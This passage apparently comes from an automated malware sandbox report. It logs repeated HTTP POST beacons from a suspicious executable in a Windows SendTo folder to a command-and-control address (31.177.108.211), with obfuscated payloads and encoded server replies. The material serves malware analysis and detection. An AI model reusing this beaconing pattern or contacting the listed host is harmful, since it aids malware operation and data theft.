                                          Sep 13, 2024 21:03:16.645234108 CEST2532OUTData Raw: 5e 56 43 5f 55 40 5c 57 59 5f 51 51 52 51 54 52 5a 5e 5a 5e 55 51 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VC_U@\WY_QQRQTRZ^Z^UQSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9@*/#7!(+*<+(8Q+?*\3#2#% Y1;9[&!^-
                                          Sep 13, 2024 21:03:17.098423958 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:17.257046938 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          48192.168.2.45671731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:17.425843000 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          49192.168.2.45671831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:17.628149986 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:17.972848892 CEST2108OUTData Raw: 5b 56 46 51 50 46 5c 55 59 5f 51 51 52 5b 54 55 5a 59 5a 5a 55 57 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VFQPF\UY_QQR[TUZYZZUWSEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A+%41:#3:=)?,5Z=7?[$U(V%\?B1? %9[&!^-+
                                          Sep 13, 2024 21:03:19.314418077 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:19.314533949 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 57 25 2b 3b 55 2c 2d 32 14 33 2f 28 1e 29 20 35 44 29 2d 16 5b 2c 3a 21 06 30 5d 35 5a 33 05 2f 5a 33 3c 30 09 3d 3a 2e 46 0d 1d 25 1a 3f 2c 30 1f 3e 07 3c 5d 27 10 21 59 20 56 3b 19 33 3c 3b 1c 20 5a 26 59 20 21 38 0b 25 5c 39 5d 2f 43 29 07 2a 1f 03 00 37 0c 2e 55 0f 15 3a 0a 24 31 39 0e 3c 0c 01 5b 29 11 2e 1d 26 06 37 56 32 2b 06 57 33 38 26 53 25 11 2d 1f 27 31 33 5b 2b 2d 29 53 22 31 08 57 36 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<6;W%+;U,-23/() 5D)-[,:!0]5Z3/Z3<0=:.F%?,0><]'!Y V;3<; Z&Y !8%\9]/C)*7.U:$19<[).&7V2+W38&S%-'13[+-)S"1W6'T#(V3YT0
                                          Sep 13, 2024 21:03:19.314564943 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 57 25 2b 3b 55 2c 2d 32 14 33 2f 28 1e 29 20 35 44 29 2d 16 5b 2c 3a 21 06 30 5d 35 5a 33 05 2f 5a 33 3c 30 09 3d 3a 2e 46 0d 1d 25 1a 3f 2c 30 1f 3e 07 3c 5d 27 10 21 59 20 56 3b 19 33 3c 3b 1c 20 5a 26 59 20 21 38 0b 25 5c 39 5d 2f 43 29 07 2a 1f 03 00 37 0c 2e 55 0f 15 3a 0a 24 31 39 0e 3c 0c 01 5b 29 11 2e 1d 26 06 37 56 32 2b 06 57 33 38 26 53 25 11 2d 1f 27 31 33 5b 2b 2d 29 53 22 31 08 57 36 01 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:<6;W%+;U,-23/() 5D)-[,:!0]5Z3/Z3<0=:.F%?,0><]'!Y V;3<; Z&Y !8%\9]/C)*7.U:$19<[).&7V2+W38&S%-'13[+-)S"1W6'T#(V3YT0
                                          Sep 13, 2024 21:03:19.314933062 CEST374INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 57 25 2b 3b 55 2c 2d 32 14 33 2f 28 1e 29 20 35 44 29 2d 16 5b 2c 3a 21 06 30 5d 35 5a 33 05 2f 5a 33 3c 30 09 3d 3a 2e 46 0d 1d 25 1a 3f 2c 30 1f 3e 07 3c 5d 27 10 21 59 20 56 3b 19 33 3c 3b 1c 20 5a 26 59 20 21 38 0b 25 5c 39 5d 2f 43 29 07 2a 1f 03 00 37 0c 2e 55 0f 15 3a 0a 24 31 39 0e 3c 0c 01 5b 29 11 2e 1d 26 06 37 56 32 2b 06 57 33 38 26 53 25 11 2d 1f 27 31 33 5b 2b 2d 29 53 22 31 08 57 36 01 27 54 23 00 28 56 [TRUNCATED]
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding98:<6;W%+;U,-23/() 5D)-[,:!0]5Z3/Z3<0=:.F%?,0><]'!Y V;3<; Z&Y !8%\9]/C)*7.U:$19<[).&7V2+W38&S%-'13[+-)S"1W6'T#(V3YT0
                                          Sep 13, 2024 21:03:19.558084011 CEST374INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0d 1e 3a 0c 3c 36 3b 57 25 2b 3b 55 2c 2d 32 14 33 2f 28 1e 29 20 35 44 29 2d 16 5b 2c 3a 21 06 30 5d 35 5a 33 05 2f 5a 33 3c 30 09 3d 3a 2e 46 0d 1d 25 1a 3f 2c 30 1f 3e 07 3c 5d 27 10 21 59 20 56 3b 19 33 3c 3b 1c 20 5a 26 59 20 21 38 0b 25 5c 39 5d 2f 43 29 07 2a 1f 03 00 37 0c 2e 55 0f 15 3a 0a 24 31 39 0e 3c 0c 01 5b 29 11 2e 1d 26 06 37 56 32 2b 06 57 33 38 26 53 25 11 2d 1f 27 31 33 5b 2b 2d 29 53 22 31 08 57 36 01 27 54 23 00 28 56 [TRUNCATED]
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding98:<6;W%+;U,-23/() 5D)-[,:!0]5Z3/Z3<0=:.F%?,0><]'!Y V;3<; Z&Y !8%\9]/C)*7.U:$19<[).&7V2+W38&S%-'13[+-)S"1W6'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          50192.168.2.45671931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:17.854718924 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:18.207760096 CEST2528OUTData Raw: 5e 55 43 53 55 43 59 56 59 5f 51 51 52 59 54 52 5a 58 5a 50 55 57 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UCSUCYVY_QQRYTRZXZPUWSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*?6[72)_ !]=:(?*+$??:3 V2'A&/01;9[&!^-'
                                          Sep 13, 2024 21:03:19.314503908 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:19.314744949 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:19.314771891 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:19.315210104 CEST225INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0
                                          Sep 13, 2024 21:03:19.558542013 CEST225INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          51192.168.2.45672031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:19.856996059 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:20.209326029 CEST2528OUTData Raw: 5e 56 46 51 55 4a 59 57 59 5f 51 51 52 59 54 51 5a 5d 5a 50 55 51 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VFQUJYWY_QQRYTQZ]ZPUQS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A*,*Y #X(8:V?<=Y+8;(?:]$#%:$%2;9[&!^-+
                                          Sep 13, 2024 21:03:20.894411087 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:20.895653009 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:20.895832062 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:20 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          52192.168.2.45672131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:21.031596899 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:21.379127979 CEST2532OUTData Raw: 5b 56 43 51 50 46 59 57 59 5f 51 51 52 5f 54 50 5a 5d 5a 5e 55 55 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [VCQPFYWY_QQR_TPZ]Z^UUSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+Y#!= 06((.W+*(0V(:Z'(&:%&9[&!^-;
                                          Sep 13, 2024 21:03:21.798057079 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:21.929012060 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          53192.168.2.45672231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:22.057118893 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:22.410348892 CEST2532OUTData Raw: 5e 54 43 56 55 45 5c 51 59 5f 51 51 52 51 54 55 5a 5f 5a 5f 55 5e 53 45 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^TCVUE\QY_QQRQTUZ_Z_U^SEPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(2[419^ U5\>9(-*U?Z6\3,1?C$,$';9[&!^-
                                          Sep 13, 2024 21:03:22.966165066 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:22.966217995 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:22.966382027 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          54192.168.2.45672331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:23.130951881 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:23.488631010 CEST2528OUTData Raw: 5e 56 43 57 55 40 59 55 59 5f 51 51 52 59 54 57 5a 5f 5a 5b 55 54 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VCWU@YUY_QQRYTWZ_Z[UTSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C(,&X#1##%\)"=<)^=8 U<<6%31 2_2;9[&!^-3
                                          Sep 13, 2024 21:03:24.163547039 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:24.163832903 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:24.163933039 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          55192.168.2.45672431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:24.288075924 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:24.644937992 CEST2532OUTData Raw: 5b 51 43 57 55 42 59 51 59 5f 51 51 52 5e 54 50 5a 5d 5a 58 55 52 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCWUBYQY_QQR^TPZ]ZXURSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D(Y6Y4!5 -]=6=/)_+8$P+/>Y$#(1)8%<%9[&!^-
